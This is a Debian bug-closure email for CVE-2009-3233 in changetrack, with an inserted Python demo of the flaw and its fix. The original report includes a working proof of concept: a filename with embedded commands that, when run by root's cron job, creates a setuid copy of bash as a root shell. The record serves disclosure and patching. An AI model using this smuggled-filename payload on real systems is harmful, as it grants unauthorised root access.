Your message dated Thu, 17 Sep 2009 22:18:08 +0000
with message-id <[email protected]>
and subject line Bug#546791: fixed in changetrack 4.5-2
has caused the Debian Bug report #546791,
regarding CVE-2009-3233: shell command injection via filename
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
546791: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546791
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole
-- System Information:
Debian Release: 5.0.2
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages changetrack depends on:
ii libfile-ncopy-perl 0.34-1 file copying like cp for perl
ii perl 5.10.0-19 Larry Wall's Practical Extraction
Versions of packages changetrack recommends:
ii cron 3.0pl1-105 management of regular background p
ii ed 0.7-3 The classic unix line editor
changetrack suggests no packages.
-- no debconf information
It is possible to run commands as root if you have permission to create
files in a directory checked via changetrack, example:
mkdir /etc/test
touch "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash bash.ultimate
chmod ug+s bash.ultimate
"
echo "/etc/test/*" >> /etc/changetrack.conf
wait for /etc/cron.hourly/changetrack
# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 Sep 15 20:52 /bin/bash.ultimate
bash.ultimate -p ;)
Probably changetrack should not use shell commands, or escape sh special
characters like spaces, newlines, ';' etc...
--
Regards
Marek Grzybowski
--- End Message ---
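The report above boils down to one pattern: a filename taken from a directory glob is interpolated into a shell command string, so a filename containing a newline or ';' becomes extra commands that sh runs with changetrack's privileges (root, from cron). The following is an added example, not changetrack's own code (changetrack is written in Perl; this reconstruction is in Python). It creates a file whose name carries an injected `echo`, shows the vulnerable string-interpolation form executing it, and contrasts that with a filename allow-list plus list-form invocation that never goes through sh. The allow-list regex is an assumption for the demo, not the exact character set used in the 4.5-2 fix. It runs as a normal user in a temporary directory on a POSIX system; the only injected payload is `echo`.

```python
"""Shell command injection via filename, and the two defences that close it.

Added example, not code from changetrack or the Debian package. Run on a
POSIX system as an unprivileged user; nothing here touches real config.
"""
import os
import re
import subprocess
import tempfile

# Marker the injected payload prints; constructed for this demo.
MARKER = "INJECTED_BY_FILENAME"

# Constructed hostile filename, in the spirit of the multi-line `touch` in
# the report: the newline ends the intended command, and sh parses the rest
# of the name as a second command.
HOSTILE_NAME = "sth\necho " + MARKER


def run_vulnerable(path: str) -> str:
    """Vulnerable pattern: the path is pasted into a string that sh re-parses."""
    cmd = f"ls -l {path}"  # anything in `path` is now shell syntax
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout + out.stderr


# Conservative allow-list (assumption for this demo, not the 4.5-2 diff's
# exact set): letters, digits and a few punctuation characters that sh does
# not treat specially. Anything else, including newline, ';', '$', quotes
# and spaces, is rejected.
SAFE_PATH = re.compile(r"^[A-Za-z0-9_./+@%,:=-]+$")


def is_safe_filename(path: str) -> bool:
    """Reject names with shell metacharacters or '..' path components."""
    return bool(SAFE_PATH.match(path)) and ".." not in path.split("/")


def run_safe(path: str) -> str:
    """Hardened pattern: validate the name, then exec without a shell."""
    if not is_safe_filename(path):
        raise ValueError(f"refusing unsafe filename: {path!r}")
    # List form: argv is passed to ls directly, no sh in between, so even a
    # name that slipped past the allow-list could not become a command.
    out = subprocess.run(["ls", "-l", path], capture_output=True, text=True)
    return out.stdout


def demo() -> dict:
    """Create a hostile and a benign file, run both code paths, report results."""
    with tempfile.TemporaryDirectory() as d:
        hostile = os.path.join(d, HOSTILE_NAME)
        benign = os.path.join(d, "sth.conf")
        for p in (hostile, benign):
            open(p, "w").close()

        vulnerable_injected = MARKER in run_vulnerable(hostile)

        try:
            run_safe(hostile)
            safe_rejected = False
        except ValueError:
            safe_rejected = True

        safe_ok = "sth.conf" in run_safe(benign)

    return {
        "vulnerable_injected": vulnerable_injected,  # True: echo ran via the filename
        "safe_rejected": safe_rejected,              # True: hostile name refused
        "safe_ok": safe_ok,                          # True: benign name still works
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The allow-list is the part a practitioner should tune per tool: the Debian fix took the rejection route, which is cheap and matches changetrack's use case (config files with ordinary names), but the list-form exec is what removes the bug class entirely, so a hardened version should do both rather than rely on escaping.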
--- Begin Message ---
Source: changetrack
Source-Version: 4.5-2
We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:
changetrack_4.5-2.diff.gz
to pool/main/c/changetrack/changetrack_4.5-2.diff.gz
changetrack_4.5-2.dsc
to pool/main/c/changetrack/changetrack_4.5-2.dsc
changetrack_4.5-2_all.deb
to pool/main/c/changetrack/changetrack_4.5-2_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Jens Peter Secher <[email protected]> (supplier of updated changetrack package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.5-2
Distribution: unstable
Urgency: low
Maintainer: Jens Peter Secher <[email protected]>
Changed-By: Jens Peter Secher <[email protected]>
Description:
changetrack - monitor changes to (configuration) files
Closes: 546791
Changes:
changetrack (4.5-2) unstable; urgency=low
.
* [reject-weird-filenames.diff] Fix possible local exploit by rejecting
filenames with unsafe characters (cf. CVE-2009-3233). Thanks to Marek
Grzybowski and Andrzej Lemieszek.
(Closes: #546791)
Checksums-Sha1:
3f8c484862fe780799cb222e9e167060f816380d 1203 changetrack_4.5-2.dsc
dd2276879e4e4978bcd8719305257883110c283b 13966 changetrack_4.5-2.diff.gz
bd6371b033eb49bb87c3671c6c8a62df1331f0b0 22160 changetrack_4.5-2_all.deb
Checksums-Sha256:
66ae538c9a129c6cde8d5030a367990d885cc2f8e340641fb2fabd5d649264c3 1203 changetrack_4.5-2.dsc
8c43f60545ad78d1c42605f7e507121c4e2d607d0bf280cbd56c518a0ceb1343 13966 changetrack_4.5-2.diff.gz
e25d8c2c03e2a821025b9afe3da60dcd4e13d8827420f315ab898c891c7ee0d4 22160 changetrack_4.5-2_all.deb
Files:
6453dd7fb96ed8f2cc5cf00b6a4e305a 1203 utils optional changetrack_4.5-2.dsc
28ed49102de02d769d67315616be21d0 13966 utils optional changetrack_4.5-2.diff.gz
489f18c7e76e6f00db07691d0ad178ef 22160 utils optional changetrack_4.5-2_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)
iJwEAQECAAYFAkqynasACgkQiFVdEFPVQL/C1AQAw56DBodzOh/hxvp9I3bBMi39
tYXGDnAyDF/6XkAf3zOvm5pAbuVTmazucEeiTvU+z6nNywKY71fnzEGQOaEqm5Vd
draYAes9ibVdpC+FB5Ps870gBMrJxO10tp+4oYp4s0w7ocwX8kECRAlmf4GTb1pX
rQqRLf/e6zeebf0m4hc=
=gUE0
-----END PGP SIGNATURE-----
--- End Message ---